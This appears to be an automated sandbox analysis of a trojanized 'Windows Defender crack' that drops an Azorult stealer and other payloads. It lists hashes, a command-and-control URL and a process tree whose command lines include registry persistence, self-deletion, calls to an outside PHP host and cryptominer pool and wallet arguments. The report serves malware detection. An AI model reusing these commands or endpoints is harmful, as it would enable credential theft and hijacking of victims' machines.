Analysis
-
max time kernel
16s -
max time network
65s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 06:46
Static task
static1
Behavioral task
behavioral1
Sample
Microsoft_Windows_Defender_crack.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Microsoft_Windows_Defender_crack.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Microsoft_Windows_Defender_crack.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Microsoft_Windows_Defender_crack.exe
Resource
win10v20201028
General
-
Target
Microsoft_Windows_Defender_crack.exe
-
Size
5.4MB
-
MD5
be12bd9c6b6e9e5738e171924e141b7d
-
SHA1
a90d8051e8116fe24abf2605fae1b8ad31f12104
-
SHA256
6ffb691be76a6756dbda8cc9c12b72be6a6eb89fa32770c9f1c201393c4f708c
-
SHA512
8c2031c71b856ab8010cfee225a6987e0eb1d9870c4b154a9a75db1829d0fa790dace44352e3932332e6fc612455ddc42adbc14f6ce9f91b6a736595c2986279
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Executes dropped EXE 10 IoCs
pid Process 892 keygen-pr.exe 1004 keygen-step-1.exe 1072 keygen-step-3.exe 3016 keygen-step-4.exe 2248 key.exe 3556 Setup.exe 4672 multitimer.exe 4788 setups.exe 4780 askinstall20.exe 240 setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 240 setups.tmp 240 setups.tmp 240 setups.tmp 240 setups.tmp 240 setups.tmp 240 setups.tmp 240 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 api.ipify.org 139 ipinfo.io 145 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
pid Process 4232 taskkill.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 4608 PING.EXE 5988 PING.EXE 5920 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 144 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 153 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 240 setups.tmp 240 setups.tmp -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 3556 Setup.exe Token: SeCreateTokenPrivilege 4780 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4780 askinstall20.exe Token: SeLockMemoryPrivilege 4780 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4780 askinstall20.exe Token: SeMachineAccountPrivilege 4780 askinstall20.exe Token: SeTcbPrivilege 4780 askinstall20.exe Token: SeSecurityPrivilege 4780 askinstall20.exe Token: SeTakeOwnershipPrivilege 4780 askinstall20.exe Token: SeLoadDriverPrivilege 4780 askinstall20.exe Token: SeSystemProfilePrivilege 4780 askinstall20.exe Token: SeSystemtimePrivilege 4780 askinstall20.exe Token: SeProfSingleProcessPrivilege 4780 askinstall20.exe Token: SeIncBasePriorityPrivilege 4780 askinstall20.exe Token: SeCreatePagefilePrivilege 4780 askinstall20.exe Token: SeCreatePermanentPrivilege 4780 askinstall20.exe Token: SeBackupPrivilege 4780 askinstall20.exe Token: SeRestorePrivilege 4780 askinstall20.exe Token: SeShutdownPrivilege 4780 askinstall20.exe Token: SeDebugPrivilege 4780 askinstall20.exe Token: SeAuditPrivilege 4780 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4780 askinstall20.exe Token: SeChangeNotifyPrivilege 4780 askinstall20.exe Token: SeRemoteShutdownPrivilege 4780 askinstall20.exe Token: SeUndockPrivilege 4780 askinstall20.exe Token: SeSyncAgentPrivilege 4780 askinstall20.exe Token: SeEnableDelegationPrivilege 4780 askinstall20.exe Token: SeManageVolumePrivilege 4780 askinstall20.exe Token: SeImpersonatePrivilege 4780 askinstall20.exe Token: SeCreateGlobalPrivilege 4780 askinstall20.exe Token: 31 4780 askinstall20.exe Token: 32 4780 askinstall20.exe Token: 33 4780 askinstall20.exe Token: 34 4780 askinstall20.exe Token: 35 4780 askinstall20.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4788 setups.exe 240 setups.tmp -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 4808 wrote to memory of 4280 4808 Microsoft_Windows_Defender_crack.exe 78 PID 4808 wrote to memory of 4280 4808 Microsoft_Windows_Defender_crack.exe 78 PID 4808 wrote to memory of 4280 4808 Microsoft_Windows_Defender_crack.exe 78 PID 4280 wrote to memory of 892 4280 cmd.exe 81 PID 4280 wrote to memory of 892 4280 cmd.exe 81 PID 4280 wrote to memory of 892 4280 cmd.exe 81 PID 4280 wrote to memory of 1004 4280 cmd.exe 82 PID 4280 wrote to memory of 1004 4280 cmd.exe 82 PID 4280 wrote to memory of 1004 4280 cmd.exe 82 PID 4280 wrote to memory of 1072 4280 cmd.exe 83 PID 4280 wrote to memory of 1072 4280 cmd.exe 83 PID 4280 wrote to memory of 1072 4280 cmd.exe 83 PID 4280 wrote to memory of 3016 4280 cmd.exe 84 PID 4280 wrote to memory of 3016 4280 cmd.exe 84 PID 4280 wrote to memory of 3016 4280 cmd.exe 84 PID 892 wrote to memory of 2248 892 keygen-pr.exe 85 PID 892 wrote to memory of 2248 892 keygen-pr.exe 85 PID 892 wrote to memory of 2248 892 keygen-pr.exe 85 PID 3016 wrote to memory of 3556 3016 keygen-step-4.exe 86 PID 3016 wrote to memory of 3556 3016 keygen-step-4.exe 86 PID 2248 wrote to memory of 4560 2248 key.exe 87 PID 2248 wrote to memory of 4560 2248 key.exe 87 PID 2248 wrote to memory of 4560 2248 key.exe 87 PID 1072 wrote to memory of 4580 1072 keygen-step-3.exe 88 PID 1072 wrote to memory of 4580 1072 keygen-step-3.exe 88 PID 1072 wrote to memory of 4580 1072 keygen-step-3.exe 88 PID 4580 wrote to memory of 4608 4580 cmd.exe 90 PID 4580 wrote to memory of 4608 4580 cmd.exe 90 PID 4580 wrote to memory of 4608 4580 cmd.exe 90 PID 3556 wrote to memory of 4672 3556 Setup.exe 91 PID 3556 wrote to memory of 4672 3556 Setup.exe 91 PID 3556 wrote to memory of 4788 3556 Setup.exe 92 PID 3556 wrote to memory of 4788 3556 Setup.exe 92 PID 3556 wrote to memory of 4788 3556 Setup.exe 92 PID 3016 wrote to memory of 4780 3016 keygen-step-4.exe 93 PID 3016 wrote to memory of 4780 3016 keygen-step-4.exe 93 PID 3016 wrote to memory of 4780 3016 keygen-step-4.exe 93 PID 4788 wrote to memory of 240 4788 setups.exe 94 PID 4788 wrote to memory of 240 4788 setups.exe 94 PID 4788 wrote to memory of 240 4788 setups.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_Defender_crack.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_Defender_crack.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4560
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:1004
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Users\Admin\AppData\Local\Temp\Z5MLQ3U9G8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Z5MLQ3U9G8\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:4672 -
C:\Users\Admin\AppData\Local\Temp\Z5MLQ3U9G8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Z5MLQ3U9G8\multitimer.exe" 1 3.1617432417.60680f61cee3b 1016⤵PID:936
-
C:\Users\Admin\AppData\Local\Temp\Z5MLQ3U9G8\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Z5MLQ3U9G8\multitimer.exe" 2 3.1617432417.60680f61cee3b7⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\3t0kf0ey3z1\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\3t0kf0ey3z1\Setup3310.exe" /Verysilent /subid=5778⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\is-E29KL.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-E29KL.tmp\Setup3310.tmp" /SL5="$3031E,138429,56832,C:\Users\Admin\AppData\Local\Temp\3t0kf0ey3z1\Setup3310.exe" /Verysilent /subid=5779⤵PID:5624
-
-
-
C:\Users\Admin\AppData\Local\Temp\4szkxpvllbc\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\4szkxpvllbc\KiffApp1.exe"8⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\d0mrohg30n4\mpgpxq2xbfi.exe"C:\Users\Admin\AppData\Local\Temp\d0mrohg30n4\mpgpxq2xbfi.exe" /VERYSILENT8⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\is-U15IV.tmp\mpgpxq2xbfi.tmp"C:\Users\Admin\AppData\Local\Temp\is-U15IV.tmp\mpgpxq2xbfi.tmp" /SL5="$8032C,2592217,780800,C:\Users\Admin\AppData\Local\Temp\d0mrohg30n4\mpgpxq2xbfi.exe" /VERYSILENT9⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\is-2N1T8.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-2N1T8.tmp\winlthsth.exe"10⤵PID:5832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pbycys3fcjf\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\pbycys3fcjf\cpyrix.exe" /VERYSILENT8⤵PID:5716
-
-
C:\Users\Admin\AppData\Local\Temp\ykala0xh3lg\z1qza3lomvn.exe"C:\Users\Admin\AppData\Local\Temp\ykala0xh3lg\z1qza3lomvn.exe" /ustwo INSTALL8⤵PID:5816
-
-
C:\Users\Admin\AppData\Local\Temp\dr11ay3b0sx\f4xrd0zmu5r.exe"C:\Users\Admin\AppData\Local\Temp\dr11ay3b0sx\f4xrd0zmu5r.exe"8⤵PID:5900
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\dr11ay3b0sx\f4xrd0zmu5r.exe"9⤵PID:3316
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5988
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sfgn00wmwpn\app.exe"C:\Users\Admin\AppData\Local\Temp\sfgn00wmwpn\app.exe" /8-238⤵PID:5940
-
-
C:\Users\Admin\AppData\Local\Temp\bblhq0t2uga\vict.exe"C:\Users\Admin\AppData\Local\Temp\bblhq0t2uga\vict.exe" /VERYSILENT /id=5358⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\is-1CVT5.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-1CVT5.tmp\vict.tmp" /SL5="$50350,870426,780800,C:\Users\Admin\AppData\Local\Temp\bblhq0t2uga\vict.exe" /VERYSILENT /id=5359⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\is-VPG1L.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-VPG1L.tmp\win1host.exe" 53510⤵PID:5548
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gw2r5jkkzag\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\gw2r5jkkzag\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\is-73RU4.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-73RU4.tmp\IBInstaller_97039.tmp" /SL5="$80364,14574851,721408,C:\Users\Admin\AppData\Local\Temp\gw2r5jkkzag\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:2228
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-0K453.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5540
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-0K453.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5804
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:5356
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:4884
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:5516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d5b1nccf34d\vpn.exe"C:\Users\Admin\AppData\Local\Temp\d5b1nccf34d\vpn.exe" /silent /subid=4828⤵PID:6136
-
C:\Users\Admin\AppData\Local\Temp\is-CNOAE.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-CNOAE.tmp\vpn.tmp" /SL5="$10482,15170975,270336,C:\Users\Admin\AppData\Local\Temp\d5b1nccf34d\vpn.exe" /silent /subid=4829⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\spq1mrsdgvf\a1ag0u5ur55.exe"C:\Users\Admin\AppData\Local\Temp\spq1mrsdgvf\a1ag0u5ur55.exe" /quiet SILENT=1 AF=7568⤵PID:5144
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\VEL4QSZNDL\setups.exe"C:\Users\Admin\AppData\Local\Temp\VEL4QSZNDL\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\is-R4RKG.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-R4RKG.tmp\setups.tmp" /SL5="$60058,635399,250368,C:\Users\Admin\AppData\Local\Temp\VEL4QSZNDL\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4780 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5092
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:3280
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4592
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:3164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:2632
-
C:\Users\Admin\AppData\Roaming\D24A.tmp.exe"C:\Users\Admin\AppData\Roaming\D24A.tmp.exe"5⤵PID:1008
-
C:\Users\Admin\AppData\Roaming\D24A.tmp.exe"C:\Users\Admin\AppData\Roaming\D24A.tmp.exe"6⤵PID:2636
-
-
-
C:\Users\Admin\AppData\Roaming\D373.tmp.exe"C:\Users\Admin\AppData\Roaming\D373.tmp.exe"5⤵PID:5044
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5340
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5436
-
-
-
C:\Users\Admin\AppData\Roaming\D440.tmp.exe"C:\Users\Admin\AppData\Roaming\D440.tmp.exe"5⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:1788
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:2588
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2136
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2204
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2312
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2160
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\5960c13b4eab4e1a96f2f8070fd4e0e6 /t 4496 /p 25761⤵PID:5680
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5324